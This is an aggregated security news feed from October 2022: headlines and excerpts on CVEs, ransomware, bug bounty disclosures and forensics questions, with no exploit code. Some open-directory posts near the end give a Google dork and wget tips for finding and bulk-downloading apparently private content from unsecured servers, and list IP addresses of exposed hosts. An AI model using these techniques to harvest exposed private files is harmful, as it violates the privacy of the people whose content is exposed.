    Author: The_Itach1@知道创宇404实验室. Date: October 25, 2022. Vulnerability overview: several CVEs were recently reported for the TOTOLINK NR1800X; this article analyzes its command injection in detail, along with its login bypass. Firmware download: https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/225/ids/36.html Environment setup: ...

    Data mapping
    Hi everyone, I hope this is the right sub to ask. I’m on my company’s privacy team and currently working on a data map charting the flow of data through the company. Any ideas on which software or program to use to create it? I was thinking of using Visio but I was hoping for something more modern looking and that could be interactive, with drop downs incorporated that provide explanation and that sort of thing. Not sure if it exists but thought I’d ask. Thank you in advance! submitted by /u/millennial_dad
    Very interesting case of AV quarantine gone wrong....
    Report here about how a UK company got breached by a phishing email. TL;DR - phishing email arrives, malware gets put in quarantine by endpoint AV, but company still gets breached. Official report on event released. Here is the interesting comment in the report: The anti-virus in use quarantined the malware and dispatched an alert, but Interserve "failed to thoroughly investigate the suspicious activity," I always thought that malware in quarantine was a) detected by the software and b) while in quarantine the malware was just a zombie. But, obviously not in this case. The hackers seemed to have compromised every system. How did this happen if the malware was quarantined (or was that just a symptom?) https://www.theregister.com/2022/10/25/gone_phishing_uk_data_watchdog/ submitted by /u/baghdadcafe
    Remediate spoofed emails
    An email account of ours is getting spoofed, info@company.com. What I mean is someone or something is spamming hundreds of addresses a day and spoofing their email headers to make it look like those emails are coming from our info@company.com address. The issue is not that we are getting spoofed emails or humans replying back asking why we're flooding their inboxes. At this point from what I've seen it's 95+% messages from email servers rejecting delivery for various reasons and notifying us the email was not delivered. Our mail server is on MS365, MX, SPF, TXT, DMARC, DKIM are all set up and I am getting RUA summaries to the designated admin address. I have also changed mailbox passwords and enabled MFA. We do have an ERP system that uses App Passwords and likely a less secure version of SMTP to send email out. My question is if there is something that can be done when someone is spoofing your email in this way. Admittedly this is a new role for me; in the past, I've assigned this kind of work to our expert and he had the experience to know what to do. Part of me wants to assume there's nothing to do about this beyond just filtering out the Delivery Failure emails and calling it a day. The other part of me is worried that some door may be open somewhere because of how my predecessor integrated our ERP platform and I'm simply not looking in the right place. I don't think the spam emails are coming from our email server but how can I be sure? submitted by /u/socal_it_services
    Best practices for malware analysis and securing the environment you're testing in.
    How do big companies proceed with analyzing malware? Do they have local sandboxes or use someone else's services like Hybrid Analysis or the paid version of ANY.RUN? If they do it locally, what are the best practices? Do you dedicate a VM? How do you secure it? Do you nest another VM inside it? submitted by /u/tryingtoworkatm
    How can one use exec() to execute a file stored in a buffer (memory)? (C/C++)
    Hello everyone! I have a project where I receive a file over sockets into a buffer. I want to avoid writing this to a temporary file if at all possible; just execute and immediately free the buffer. In Windows, I believe I've seen that there is a way to link a DLL from a buffer, but I'm not quite sure how to do this in Linux/UNIX. I have full control on the format of both the binary file sent and the receiver, so any method involving .so files is a valid path. I'd like a bit more freedom than being constrained to receiving shell code. Thank you for your time! submitted by /u/1337InfoSec

    4 Ways Conventional SIEM Advances into NextGen SIEM
    submitted by /u/Pale-Cobbler-4895
    Melis Platform CMS patched for critical RCE flaw (CVE-2022-39297)
    submitted by /u/monoimpact
    GitHub Actions are being abused to run mining operations
    submitted by /u/MiguelHzBz
    Stranger Strings: An exploitable flaw in SQLite
    submitted by /u/jeandrew
    The Logging Dead: Two Event Log Vulnerabilities Haunting Windows
    submitted by /u/lohacker0
    Firefox and Chromium | Madaidan's Insecurities
    submitted by /u/gquere
    Chapter 1 — From Gozi to ISFB: The history of a mythical malware family
    submitted by /u/CyberMasterV

    Project Guidance - US Secondary Ed
    I'm a secondary biological sciences teacher that's been tasked with writing a science curriculum for a STEMM program - I'm using/want to use forensics as the basis of the 9th grade year. I have a handle on the bio and the physics, but I was told to include a coding and engineering project in the curriculum. I've got nothing for a forensics coding unit, and a major problem being I know minimal coding. I read the FAQs and will check out the blogs and watch forensics lunch, but they all seem a bit over my head. Would anyone be able to point me in a direction for something that would be on a 9th grade level for students that have only been exposed to projects from Code.org and CodeHS? Is this even possible or is the background knowledge needed too great for such a thing? - so far all I can think of is trying to come up with some sort of fake code to have students look for patterns in, as from listening to the news hackers sometimes have a digital signature. - most projects I have found are more about the legal side of computer forensics. Thanks for any recommendations! submitted by /u/eryngiumechinops
    USB Token with Digital Signature Certificate (DSC) extraction
    Hi. We received some USB dongles to identify their owner. They are similar to this: https://www.novelonlineservice.com/product-page/safenet-etoken-5110-usb-token We use Tableau Bridge T8u as a write blocker for USB extraction but it won't recognize it. As it is a DSC token, I was wondering the best approach to this. Maybe just normally insert it into the computer? submitted by /u/Albcunha
    IoT Forensics
    Hello everyone, For a work at university, I want to create a framework for IoT forensics that covers the whole forensic process (from the proactive part to the actual forensics on the device). The thing is, I have to test/evaluate that framework. My initial idea was to do it on different IoT devices and show that the framework is applicable on all of them. Do you have any advice? Another idea of testing the framework? Which devices should I use? Ideas of cheap devices on which I could do my tests? Or maybe I can emulate several devices? Thank you all for the help! submitted by /u/Volitite

    How I define OSINT
    Ok, I’m finally just going to go ahead and start this. I’ve been sitting on this for too long and just procrastinating too much. I’ll add… Continue reading on Medium »
    Web Browsing Privacy with Kasm Workspaces
    About a year ago a colleague posted an interesting article (Safer browsing with Kasm) on how he was using Kasm’s Browser Isolation… Continue reading on Medium »
    Ad: “Selling war trophy from Ukraine, with traces of soldier’s blood”.
    It's getting more common to stumble across ads on the web advertising the sale of war trophies from the current Ukrainian war. Is this… Continue reading on Medium »
    OSINT 0x3: Getting Sillier…And Quicker!
    Disclaimer: this write-up is for educational purposes only. Use your skills for good. Continue reading on Medium »

    Exploiting SSRF Using Export PDF
    Server Side Request Forgery (SSRF) is an attack where the server will act like a proxy for the attacker for accessing a local or to a… Continue reading on Medium »
    HTTP request smuggling Explained and Exploited Part 0x3
    Hi! My name is Hashar Mujahid, and today we will continue to discuss what HTTP request smuggling vulnerabilities are and how we can… Continue reading on InfoSec Write-ups »
    Support supports a Hacker
    Manipulating user accounts via Helpdesk Continue reading on Medium »
    Stepping Into Blockchains? It’s Time To Know the Basics…
    There’s a huge fuss surrounding Blockchains nowadays. Many people talk about it but only a few have a real understanding of it. Continue reading on Bug Zero »

    DEV-0832 (Vice Society) opportunistic ransomware campaigns impacting US education sector
    submitted by /u/SCI_Rusher
    Offensive Security Methodology Repo
    Hello, repo under creation containing testing methodology and techniques for wireless, internal, external engagements and other cool stuff to share ;) https://github.com/lutzenfried/Methodology submitted by /u/lutzenfried
    The Logging Dead: Two Event Log Vulnerabilities Haunting Windows
    submitted by /u/lohacker0

    SecWiki News 2022-10-25 Review
    A security engineer's story of Maven repackaging, by ourren. For more of the latest articles, visit SecWiki.

    LastPass in Memory Exposure
    In this video, our Principal Research Analyst Scott Nusbaum goes over his research on LastPass Password Manager. He discusses how the credentials are exposed in memory to an attacker that is present on the host and is able to access the browser process. He also goes over how LastPass could modify their extension to... The post LastPass in Memory Exposure appeared first on TrustedSec.
    A Primer on Cloud Logging for Incident Response
    Overview This blog post will provide an overview of common log sources in Azure and AWS, along with associated storage and analysis options. At a high level, cloud-based incidents can be categorized into host-based compromises (that is, compromises primarily involving virtual machines hosted in the cloud) and identity-based or resource-based compromises (compromises primarily involving cloud-native... The post A Primer on Cloud Logging for Incident Response appeared first on TrustedSec.

    Red Team Penetration Testing with vulnerable_docker: Docker Escape
    This project walkthrough uses information gathering, getting a shell through a WordPress vulnerability, internal network enumeration, Docker escape, privilege escalation and more, and includes tips on obtaining a stable shell and bringing a Linux host online in CS. Everyone is welcome to learn from it or point out its shortcomings.
    Hive Ransomware Group Claims Attack on Tata Power; Data May Have Leaked
    Not long ago Tata Power, India's largest power group, disclosed that it had suffered a cyberattack. On October 25, the Hive ransomware group claimed responsibility for the attack.
    FreeBuf Morning Report | WhatsApp Outages in Many Regions Worldwide; South Korea Joins a US-led Cyber Warfare Exercise for the First Time
    South Korea's Ministry of National Defense said on the 24th that the South Korean military began participating that day, for the first time, in the US-led multinational joint cyber offense-defense exercise "Cyber Flag", which runs until the 28th.
    With Over 20 Million Installs, Google Play Has Become a Breeding Ground for Adware
    One of the apps, named DxClean, has been installed more than 5 million times; absurdly, it still holds a user rating of 4.1 out of 5.
    Reversal Is the Movement of the Tao: Thoughts on Data Security in Fintech | CIS 2022 Cybersecurity Innovation Conference Topic Preview
    The talk shares, mainly from a vulnerability researcher's perspective, the evolution and development of fuzzing technology and practical exploration of framework-layer vulnerability discovery on mobile.
    Asked for 60 Million, This Car Dealer Refuses to Pay!
    Pendragon, a well-known UK car dealership group, was recently attacked by the LockBit ransomware group; some data was stolen and a ransom of USD 60 million was demanded.

    Android Pentesting 101 — Part 2
    HTTP request smuggling Explained and Exploited Part 0x3
    Faster your NMAP scan with “Agile Grabber”

    Reflected Cross site scripting via Swagger UI
    Adobe disclosed a bug submitted by webcipher101: https://hackerone.com/reports/1656650
    A malicious admin can be able to permanently disable a Owner(Admin) to access his account
    Linktree disclosed a bug submitted by dewcode91: https://hackerone.com/reports/1718574 - Bounty: $600

    Animation Reference Sheets
    http://incandescentdragon.com/Settei/preview/A4/Sheets/ crap ton of animation sheets from various anime and cartoons submitted by /u/Better_Base8805
    NASA photos
    submitted by /u/PM_ME_TO_PLAY_A_GAME
    radio manuals
    submitted by /u/PM_ME_TO_PLAY_A_GAME

    Apache Commons Configuration Remote Command Execution CVE-2022-33980
    Author: 标准云. This article is a contributed submission; Seebug Paper welcomes your contributions, and every accepted submission receives a gift! Submission email: paper@seebug.org Vulnerability overview: Apache Commons Configuration performs variable interpolation, which allows properties to be dynamically evaluated and expanded. The standard interpolation format is "${prefix:name}", where "prefix" is used to locate the interpolator that performs the ...

    Buffer overflow, canary enabled but program only seems to accept arguments as input
    submitted by /u/Cascodius

    Racing Cats to the Exit: A Boring Linux Kernel Use-After-Free
    submitted by /u/0x414141
    Exploit archaeology: A forensic history of in-the-wild NSO Group exploits
    submitted by /u/DonnchaOC
    OSINT analysis of Gulf focused job scams
    submitted by /u/jen140
    Exploiting a Flipper Zero
    submitted by /u/VVX7
    OSS patcher for CVE-2022-42889 (TextShell) - Finds and closes the vulnerability on deployed JAR files
    submitted by /u/SRMish3
    VulFi plugin for IDA updated to version 2.0 with new features
    submitted by /u/Martypx00
    Talk recordings from DEF CON 30
    submitted by /u/albinowax
    Legitimate RATs: a comprehensive forensic analysis of the usual suspects
    submitted by /u/jeandrew

    Remotely Accessible Container Advisor exposed performance metrics and resource usage
    TikTok disclosed a bug submitted by tw4v3sx: https://hackerone.com/reports/1697599 - Bounty: $100
    IDOR Allows Viewer to Delete Bin's Files
    Lark Technologies disclosed a bug submitted by snapsec: https://hackerone.com/reports/1074420 - Bounty: $500
    Viewer is able to leak the previous versions of the file
    Lark Technologies disclosed a bug submitted by snapsec: https://hackerone.com/reports/1080700 - Bounty: $550

    Biglots - corporate site with all assets available
    https://www.biglots.com/resources/ Seems their entire directory structure is exposed submitted by /u/xavierwestern
    Diving and underwater photos
    http://hagainativ.com/wordpress/wp-content/uploads/ I did not go through every photo. Folders from 2016-02 onward seem to be empty submitted by /u/xavierwestern
    MG Auto pictures and information
    http://www.omgc.info/wordpress/wp-content/uploads/ Didn't look through all the pics, but the site is for the Ottawa MG Club so most content is focused on that. submitted by /u/xavierwestern
    [NSFW] Amateur pr0n pics and some movies.
    Went looking for onlyfans content - intitle:"index of" -inurl:"index of" onlyfans I figured there has to be someone dumb enough to put their content on an unsecured webserver... Jury's out on what I found. https://www.kurtvip.com/wp-content/uploads/2020/ just a run of the mill wordpress index - change the year to move up or down as going up to the "uploads" folder looks like it's been secured. To avoid downloading all the extra resized images try --reject-regex=45x45 | 346x128 and so on. https://playblog.ws/play/wp-content/uploads/ https://fapdungeon.com/wp-content/uploads/ ditto for wp indexes - freely navigable. Even got one for the gay guys - https://nudesboys.com/wp-content/uploads/ submitted by /u/ringofyre

    SSRF & LFI In Uploads Feature
    Hello fellow hackers, today I will discuss how I found a Server-Side Request Forgery (SSRF) which lead to a Local File Inclusion (LFI)… Continue reading on Medium »
    How I Found A Simple Stored XSS
    This is the story of how I found my first Stored XSS (“Cross Site Scripting”) vulnerability in a bug bounty program and a walk through on… Continue reading on Medium »
    5000$ for Apple Stored Xss And Another Blind Xss Still under review
    How I found two Xss At Apple that Lead for high/critical impact Continue reading on Medium »
    How I Found Three Credentials Leak on One Google Dork on Bugcrowd
    Tool Continue reading on Medium »
    Hacking a parking system
    Have you ever been to a shopping mall and used an NFC card to access(and pay) the parking spot? In this article, I will explain how I got… Continue reading on Medium »

    Legitimate RATs: a comprehensive forensic analysis of the usual suspects
    submitted by /u/warm_kitchenette

    How can I read Threads memory using Memprocfs?
    I grabbed a RAM capture (using winpmem) of a Windows 10 VM. I open the file with memprocfs and I can see the threads of a process, and I have the vvmem files. How do I know which memory positions belong to each thread? I'm posting an image to help https://imgur.com/a/k6uhmCs submitted by /u/kabutor
    Digital Evidence Specialist 1
    Hi. I’m in Miami, FL, and I see a job with the police department titled digital evidence specialist 1. It doesn’t have a description so I was wondering if, from the title, it seems like computer forensics? What would I do in this job? submitted by /u/Roccstarr95
    Can anyone identify the content of this image? Like what is going on in here?
    submitted by /u/shalnark90

    Atlassian Jira Align High-Risk Vuln Write-up
    submitted by /u/breach_house

    Cloudgoat AWS CTF solution - Scenario 9 (codebuild_secrets)
    Scenario 9 - codebuild_secrets Continue reading on Medium »
    ROOTCON 16 (Hacking Conference)
    Here are the pictures i captured during the event of Rootcon 16 that held in Vista Tagaytay. Continue reading on Medium »

    Lest we forget? I forgot, how to keep fundamental information fresh in our minds?
    A colleague reminded me today that CSRF can be implemented client-side a-la Facebook. It made me question what volume of relevant, useful and creative information and techniques had escaped from my memory that might otherwise have helped me find a bug or recommend a defence in depth approach to our development team. I wondered if the people in this sub might share their methods for retaining this information. I keep (bad) notes, I complete training like pentesterlabs and new PortSwigger stuff when it is published and I spend a lot of time looking things up online when I'm digging deep. Does anyone have any further recommendations that will help me to not forget the fundamentals when my brain always wants to chase the latest research and fun bugs? submitted by /u/jeffreyshran
    IT Disaster Recovery Assessment
    Hi all! I’m currently trying to design a baseline assessment for IT Disaster Recovery. I want the most important things in this baseline assessment. Do you guys have any sources about models, tools, books, literature regarding IT Disaster Recovery? Thanks in regards! submitted by /u/overigegebruiker12
    Typical day of malware analyst
    Hey there, Got a couple of questions for all of you with jobs related to malware analysis: what does your typical workday look like? do you do malware analysis only or is it only part of your responsibilities? if so, how much of it is actual malware analysis and what are the other activities? what kind of company are you working for? is it AV or something else? how did you get into your current position? was it always security related? do you hold any related certifications? do you think they are helpful enough to aim for them? are you working in the office or remotely? is it possible/realistic to work in this kind of position fully remotely? any advice for someone who's considering getting into/transitioning to such a position? submitted by /u/koooch

    SecWiki News 2022-10-24 Review
    Bug Bounty Hunter Series: How to Test SSO-related Vulnerabilities, by 蓝色淡风; Bold-Falcon: an open-source automated malware analysis system, by ourren; SecWiki Weekly (Issue 451), by ourren; One article to solve your app traffic-capture problems, by SecIN Community. For more of the latest articles, visit SecWiki.

    CNAME Cloaking: Disguising Third Parties Through the DNS
    CNAME cloaking uses DNS records to hide when browsers are sending data to a third party such as an advertiser. The post CNAME Cloaking: Disguising Third Parties Through the DNS appeared first on Unit 42.

    IW Weekly #30: $10,000 Bounty, Bypassing Filtration, DDoS Attack, Fuzzing for SQL Injection…

    FreeBuf Morning Report | UK Construction Giant Fined GBP 4.4 Million over Security Failures; Ransomware Attacks Targeting the Education Sector
    A UK construction company was fined more than GBP 4 million by the data protection regulator after a series of security failures allowed hackers to steal and encrypt the personal information of 110,000 current and former employees.
    Evolution of Fuzzing and Practical Exploration of Mobile Framework Security | CIS 2022 Cybersecurity Innovation Conference Topic Preview
    From a vulnerability researcher's perspective: the evolution and development of fuzzing technology and practical exploration of framework-layer vulnerability discovery on mobile.
    Retail Giant Metro Hit by Cyberattack, Payment Systems Disrupted
    Since at least October 17, Metro stores in Austria, Germany and France have been experiencing IT outages.
    New Extortion Group Operating Under Two Names Targets Companies Worldwide
    Two new cyber-extortion groups named TommyLeaks and SchoolBoys are targeting companies around the world, but investigation shows the same gang is behind both.
    Cybersecurity at the 20th Party Congress: What the Delegates Say
    As the foundation of a strong cyber nation and Digital China, cybersecurity will bear the weight of underpinning future development and is an indispensable part of China's modern industrial system.

    A study of malicious CVE proof of concept exploits in GitHub
    Article URL: https://arxiv.org/abs/2210.08374 Comments URL: https://news.ycombinator.com/item?id=33314496 Points: 3 # Comments: 0

    GuLoader Malware Disguised as a Word File Spreading in South Korea
    Author: Threat Intelligence Team. Translator: Knownsec 404 Team translation group. Original link: https://asec.ahnlab.com/en/40283/ The ASEC analysis team has found that GuLoader malware is being distributed to Korean corporate users. GuLoader is a downloader that has been distributed steadily for some time and downloads various malware. The phishing email used for distribution is shown below, with an HTML file attached. Phishing email: When the user opens the attached HTML file, it will, from the following...
    Apache Commons Text Remote Command Execution CVE-2022-42889
    Author: 标准云. This article is a contributed submission; Seebug Paper welcomes your contributions, and every accepted submission receives a gift! Submission email: paper@seebug.org Vulnerability overview: Apache Commons Text performs variable interpolation, which allows properties to be dynamically evaluated and expanded. The standard interpolation format is "${prefix:name}", where "prefix" is used to locate the interpolator that performs the interpolation, org.apach...
    CVE-2022-41852 Apache Commons JXPath Command Execution Vulnerability Analysis
    Author: xxhzz@星阑科技PortalLab. Original link: https://mp.weixin.qq.com/s/L1GyToB0pYaKua8FZi9tiw Project introduction: Apache Commons JXPath is a Java-based implementation of XPath 1.0 from the Apache Software Foundation (USA). JXPath provides traversal of graphs of JavaBeans, DOM and other types of objects using XPath syntax...

    FreeBuf Morning Report | Qatar World Cup Official Apps Alleged to Be Spyware; Interpol Sets Up a Metaverse Headquarters
    Everyone traveling to Qatar to watch the World Cup must download and install two apps, Ehteraz and Hayya, which have been alleged to be spyware.

    What is the difference between VPN and Proxy traffic encryption.
    Hi guys. I'm familiar with the concept that a VPN connects you to a different network, and basically makes you a client within that network, but a proxy (like SOCKS5) forwards your traffic (and I'd love to be corrected on that should I be mistaken), but I'm trying to pinpoint the difference with regard to encryption of the flow of traffic. Things I'm reading online are saying a proxy does not entirely encrypt the traffic, only between the proxy and the client. But is this any different from a VPN?? I thought that was literally the same thing, except a VPN would give you access to local network devices in some instances. But this is also, I suspect, VPN company marketing horseshit. Please could someone clarify the difference as I am starting to go mad. submitted by /u/reece4504
    First certification
    I have the opportunity to choose a certification that my company will pay for and I'm quite lost with all these different certs and orgs even after researching them, so I would like to ask which certification would you recommend me to get? I'd like it to be useful as well as reasonably hard for my experience. It should be blue team/incident handling related. My background: I finished my Master's in Information Security this summer and got a full time job as a security analyst with my main responsibilities being incident handling and vulnerability management. During my studies I also worked as a SOC analyst. I have about 2 years of working experience in total. The only certifications I've done during my school years are some CCNAs. submitted by /u/FreakySeahorse
    Are Alternative Operating Systems More Secure? OpenBSD, FreeBSD...
    Are alternative operating systems like OpenIndiana, FreeBSD, OpenBSD more secure than Linux, Windows and Mac? submitted by /u/LegitimateCelibate
    What’s a good cross-platform browser that has end-to-end encrypted sync data like bookmarks, history, open tabs, etc?
    What’s a good cross-platform browser that has end-to-end encrypted sync data like bookmarks, history, open tabs, etc? submitted by /u/Bored-Giraffe

    What is Website Footprinting?
    In terms of Cybersecurity, footprinting refers to the process of collecting as much information as possible about the target to find a way… Continue reading on System Weakness »
    33 quick and simple Twitter threads about OSINT
    I only started a blog on Medium today, but I’ve had a Twitter account about OSINT tools and techniques for over a year now. In this post I… Continue reading on Medium »
    SPY NEWS: 2022 — Week 42
    Summary of the espionage-related news stories for the Week 42 (October 16–22) of 2022. Continue reading on Medium »

    Prompt injection attack on GPT-3 powered chatbots
    submitted by /u/verfahrensweise
    ScreenshotBOF - CobaltStrike BOF to take screenshots without fork&run
    submitted by /u/CodeXTF2
    cypherhound - Python app that contains 190+ neo4j cyphers for BloodHound data
    submitted by /u/edreatingmonkey

    How To Craft A Professional Bug Bounty Report (Extra $$)
    TL;DR- Documenting the bugs or vulnerabilities you’ve found is the last step in bug hunting, make sure to finish strong and get the… Continue reading on The Gray Area »
    Paribus Community Update
    The Paribus protocol is the leading lending and borrowing protocol functional on the Cardano chain and capable of token and NFT… Continue reading on Medium »
    Broken Link Hijacking — My Second Finding on Hackerone!
    Broken Link Hijacking (BLH) or Link Takeover, whatever you called it, the concept is very simple. If you get any broken links of any… Continue reading on Medium »
    HTML INJECTION AND XSS ON THE HOSTEKO.COM WEBSITE
    Hi, Continue reading on Medium »

    Write-up: HTTP request smuggling, basic CL.TE vulnerability @ PortSwigger Academy
    Exposed .git Directory Exploitation
    SQL Injection: An Overview
    Hacked Tathva ’22 Biggest Techno-Management Fest in South India
    We’ve seized a hacker's computer, what now?
    Imagine you are given a hard drive that you need to examine for a criminal investigation. As is for handling all evidence, you need to be… Continue reading on InfoSec Write-ups »

    SecWiki News 2022-10-23 Review
    No news updates today. For more of the latest articles, visit SecWiki.

    Power On/Off .E01 file / Portable Case Axiom
    Hello everyone! I have a question that I could not find the answer to: what tool can I use to view when a computer had turned on and off? I've the EnCase (E01) and the Portable Case of Magnet Axiom. Thanks a lot to everyone! submitted by /u/Zipper_Ita

    Bringing Modern Authentication APIs (FIDO2 WebAuthn, Passkeys) to Linux Desktop
    submitted by /u/sanitybit
    cypherhound - Python app that contains 190+ neo4j cyphers for BloodHound data
    submitted by /u/edreatingmonkey
    The Curious Case of ManageEngine’s Password Manager Pro's Password Database
    submitted by /u/Khryse
    Chrome Browser Exploitation, Part 1: Introduction to V8 and JavaScript Internals
    submitted by /u/sanitybit

    Science Fiction books and audio
    Sci Fi Audio http://www.onesmedia.com/SCIFI/ Sci Fi Books https://eyeofmidas.com/scifi/ http://www.pauladaunt.com/books/Classic%20Science%20Fiction/ submitted by /u/Shitemoji69


    Movies, Series (EN) - Part 1 (Repost)
    http://85.224.102.85/ http://195.154.171.232/ http://178.128.170.189:81/ https://209.141.43.80/ http://140.238.19.242/ http://185.223.160.3/ https://83.128.76.15/ submitted by /u/SubliminalPoet [link] [comments]
    Movies, Series (EN) - Part 2
    http://51.68.185.186:49156/md/ http://65.108.68.213/ http://73.65.226.79:8080/ http://144.137.216.162:8080/ http://184.148.254.139:40001/ http://192.119.8.98:85/ http://72.253.204.218:8888/movies/ http://102.22.12.10:8089/ https://79.119.245.140/ http://62.210.122.240/ < Previous Post submitted by /u/SubliminalPoet [link] [comments]
    [NSFW] Series, movies, music, software, and MUCH more
    https://62.210.204.15/ => Movies, series ​ https://51.158.151.187/Jay => Music ​ https://51.159.55.137/ => Chinese podcasts and speeches, educational content ​ https://62.210.97.40/dl4.apkhome.net/f/ => Lots of modded apks ​ https://62.210.99.29/dl.uapk.pro/ => Lots of modded apks ​ http://163.172.94.57/ => Porn ​ http://195.154.42.151/ => Movies, series, porn, switch roms, music, and more (mostly in TDownloads directory) ​ http://195.154.233.56:8080/ => French memes, lots of wallpaper material (in Bordel/fivesh folder), games, and more ​ http://163.172.44.24:9000/ => French udemy courses, series ​ http://51.15.174.150/torrent/ => Series, movies ​ http://195.154.236.164:48/ => Movies, anime, some roms ​ https://51.158.36.78/s3.mangarc.com/ => Untriaged arab-translated manga ​ http://51.159.53.92/ => Movies, series, fonts, software, games ​ http://163.172.49.90:9999/ => Physics PDFs, series, movies ​ http://195.154.235.161:8888/ => Audiobooks, series, movies ​ http://51.15.160.202:8080/ => Movies, series, software, music, misc ​ http://163.172.98.148:8081/ => Movies, series ​ http://163.172.180.67:81/ => Movies, series, anime, software, games, music, books, and more ​ http://51.15.142.32:8008/ => Music, software, movies, series, misc ​ http://51.15.177.190:8081/ => Tutorials, courses, loads of various chinese PDFs ​ http://51.15.178.223/ => Series, movies ​ http://51.15.179.151/ => Series, movies (mostly german) ​ http://51.158.145.138/ondemand/ => Italian movies and cooking videos ​ http://51.158.151.61:8080/ => Games, movies, anime, OSTs ​ http://51.159.29.81/ => Software (be careful!) ​ http://51.159.29.224/web/Software/ => Rhythm games archives ​ http://62.210.132.17/ => Series, movies, music ​ http://51.15.174.41:8000/ => Hentai, porn, some series and movies submitted by /u/MasterIO02 [link] [comments]
    Links with descriptions ;0)~...
    This is a Google Drive; you can open each folder and download each file separately, or you can just click the download arrow and it will zip up the folder and download everything in it... or use wget, a lot faster... For all our gay/nonbinary/women/females/curious/collectors of r/opendirectories... so expect NSFW images & vids... https://drive.google.com/drive/folders/16n9JMdFBqNTToiPASUDmb-zRwxw9kFTj
    Yes, in this folder you will find MP3s & images: https://mixtaperiot.com/wp/wp-content/media/
    Posting this because of the tweeker-gallery, so to recap the folder is full of docs and images... http://www.forensic-applications.com/meth/
    Phone tech & stuff 2021, looks like some sort of hacking for phones... In this directory you can expect to find docs & vids, so learn or not... https://dl.parsi-rom.com/VIDEO/
    Some small vids of a BDSM club, viewer beware... Yes this is an edgy drive, so Ooo, shocking or boring, you decide... NSFW images, mp4's etc... http://lantredudiable.eu/video/
    Change your backgrounds... Images and more images... http://spartacuswallpaper.com/gallery/
    submitted by /u/xanderTgreat [link] [comments]
    NASA image catalogs?
    Apologies if this violates rule #2, but does anyone here know where/how to find NASA's full catalog of images? Obviously you can find a lot on the nasa.gov site, but those galleries are curated and definitely not comprehensive. I seem to remember coming across online directories of literally all of their images, separated by project/date/etc., but now I can't seem to find them and I'm wondering if I'm remembering wrong. Even suggestions on what to search for would be greatly appreciated. Thanks in advance! submitted by /u/netsgnut [link] [comments]
    FTP site with ISOs, VM images etc.
    Good enough collection of virtual machines, ISOs, etc. http://ftp.anisa.co.ir/ submitted by /u/amritajaatak [link] [comments]
  • Open

    Hacked Tathva ’22 Biggest Techno-Management Fest in South India
    - 7h3h4ckv157 Continue reading on InfoSec Write-ups »
    Android Pentesting 101 — Part 1
    Welcome to this new series of Android Pentesting. This series is about how you can hack into Android and find vulnerabilities in it using… Continue reading on InfoSec Write-ups »
    An Unexpected Reflected XSS
    Hello everyone, my name is Pavitra. I am not very old, I am only 13, but still a cyber sec enthusiast. I have been doing bug bounty since the age of… Continue reading on Medium »
  • Open

    installed.json sensitive file was publicly accessible on your web application which discloses information about authors and admins
    Yelp disclosed a bug submitted by whitehacker18: https://hackerone.com/reports/1586524
  • Open

    Help a newbie get a beginner pen testing job. GIAC certified.. almost..
    Hi all! So I have my Splunk Core Certified cert; it was free at the time. I just passed my GIAC GFACT cert from SANS. I'm currently enrolled in SEC401 for the GSEC cert and I have one more with SANS after this (scholarship program). I use Hack The Box and have some decent real-world skills. Say once I'm done with my certs from SANS and have my GIAC, how can I get a job in pen testing and red teaming? What job boards are best, or just how in general? I have tech experience in my past but this is my first time breaking into red teaming/pen testing. Any help would be GREATLY appreciated. Thanks! submitted by /u/BaMB00Z [link] [comments]
  • Open

    SecWiki News 2022-10-22 Review
    No news updates yet today. For more of the latest articles, visit SecWiki.
  • Open

    Collect information of internet-connected sandboxes
    submitted by /u/Snoo_27235 [link] [comments]
    SCuBA: M365 Security Baseline Assessment Tool by CISA
    submitted by /u/sanitybit [link] [comments]
  • Open

    REST API FUZZING
    With the developing technology, applications are transitioning to a platform-independent structure. In order to achieve this independence… Continue reading on Medium »
  • Open

    Android Pentesting 101 — Part 1
    No content preview
  • Open

    Adversary emulation with caldera
    emulate adversaries and automate your operation Continue reading on Medium »
  • Open

    Notes on a public-interest SRC hunt against the TP framework
    A write-up of getting a shell on a public-interest SRC target running tp5.0.15 with php7.3.
  • Open

    OSINT and Top 15 Open-Source Intelligence Tools
    This blog sheds some light on the term OSINT, its types, actors interested in OSINT gathering, exploration, and what benefits OSINT… Continue reading on Medium »

  • Open

    access nagios dashboard using default credentials in omon1.fpki.gov, 3.220.248.203
    U.S. General Services Administration disclosed a bug submitted by ahmed0x0mahmoud: https://hackerone.com/reports/1700896
    Full payment bypass to use premium subscription.
    Krisp disclosed a bug submitted by n0_m3rcy: https://hackerone.com/reports/1670304 - Bounty: $100
  • Open

    How an Attacker Can Achieve Persistence in Google Cloud Platform (GCP) with Cloud Shell
    submitted by /u/0x414141 [link] [comments]
    A Journey To The Dawn: Finding & exploiting a use-after-free privilege escalation vulnerability in Linux kernel’s io_uring subsystem (CVE-2022-1786)
    submitted by /u/0x414141 [link] [comments]
    OpenSSL: How to Configure Supported TLS Groups to Be Resistant to the DHEat attack
    submitted by /u/c0r0n3r [link] [comments]
    Antignis - Configure Windows Hostbased firewall
    Blogpost: https://www.huntandhackett.com/blog/introducing-antignis-a-data-driven-tool-to-configure-windows-hostbased-firewall submitted by /u/One-Assistance-8552 [link] [comments]
  • Open

    OTP in forget password | how to bypass OTP verification | OTP poc
    OTP Continue reading on Medium »
    Exploiting Elastic Search Instances
    Elastic search instances can have exploitation of READ,WRITE,DELETE of data. Continue reading on System Weakness »
    Subdomain Takeovers, 0Day Exploits for CVEs, Perceptual Analysis….
    Conducting Vulnerability Assessments at Scale ft. ARPSyndicate & ScanFactory Continue reading on Medium »
    Bug Bounty Tips
    cc: nahamsec Continue reading on System Weakness »
    $1,000+ P1: PII Disclosure W/ IDOR
    TL;DR- A somewhat simple, everyday IDOR that lead to PII disclosure, and could possibly be used to further exploit the app. Continue reading on The Gray Area »
    What are Smart Contracts on Blockchain?
    What are the smart contracts? Continue reading on Bug Zero »
    P1 Bug Bounties: Multi-Factor Authentication Bypass
    TL;DR-A walkthrough on how to exploit multi-factor authentication, using Burpsuite and a few other automation tools. Continue reading on The Gray Area »
    Information Disclosure — My First Finding on Hackerone!
    Information Disclosure is a kind of bug that is not so hard to find but could have a huge impact. Sometimes you could get very sensitive… Continue reading on Medium »
  • Open

    Certificate Pinning in Android requiring backup pin
    Hi. I am trying to implement certificate pinning in Android by following the Network Security Configuration. In the https://developer.android.com/training/articles/security-config#CertificatePinning section, it says that it is recommended to add a backup pin. What is this backup pin and how do I generate it? I managed to generate the main pin and it only returned 1 SHA-256 pin. submitted by /u/apprentice4ever [link] [comments]
